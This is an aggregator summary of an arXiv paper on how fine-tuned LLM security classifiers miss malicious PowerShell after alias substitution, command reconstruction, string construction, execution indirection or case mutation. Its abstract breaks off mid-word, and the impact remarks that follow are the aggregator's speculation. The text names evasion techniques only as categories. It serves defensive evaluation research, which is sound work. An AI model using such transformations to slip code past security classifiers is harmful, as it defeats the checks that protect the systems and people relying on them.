Inherited Circuits, Learned Semantics: How Fine-Tuning Creates Evasion Vulnerabilities Invisible to Standard Evaluation

arXiv:2606.27091v1 Announce Type: cross Abstract: LLMs fine-tuned for security classification are usually evaluated on held-out examples from the same distribution as their training data. We show that this can miss vulnerabilities introduced by fine-tuning itself: models can learn token-level indicator semantics that preserve canonical accuracy while failing under behavior-preserving transformations such as PowerShell alias substitution, command reconstruction, string construction, execution indirection, and case mutation. We study Foundation-Sec-8B-Instruct and its base model, Llama-3.1-8B-In
The increasing deployment of LLMs in security-sensitive roles makes the robust evaluation of their vulnerabilities critical, especially as fine-tuning becomes a standard practice.
This research highlights a significant vulnerability class in fine-tuned LLMs for security, indicating that current evaluation methods are insufficient and could lead to deployed systems with hidden flaws.
Security evaluation paradigms for AI models will need to evolve beyond standard out-of-distribution testing to include adversarial transformations that reveal fine-tuning-induced evasion capabilities.
- · Adversarial AI researchers
- · Cybersecurity firms specializing in AI red-teaming
- · Developers of robust AI security evaluation tools
- · Organizations relying on LLMs for security without advanced testing
- · Developers of AI security classification models without robust validation
- · Traditional AI model evaluation methods
Security-focused LLMs will require more sophisticated and adversarial fine-tuning and evaluation techniques to prevent subtle evasion vulnerabilities.
This could lead to a 'security arms race' in AI, where new evaluation methods constantly seek out novel circumvention techniques learned by models.
The increased cost and complexity of securing AI models may slow their deployment in critical infrastructure or highly sensitive data environments, or necessitate new regulatory standards.
This signal links to a primary source. Continuum Brief monitors and indexes it as part of the live intelligence stream — we do not republish source content.
Read at arXiv cs.AI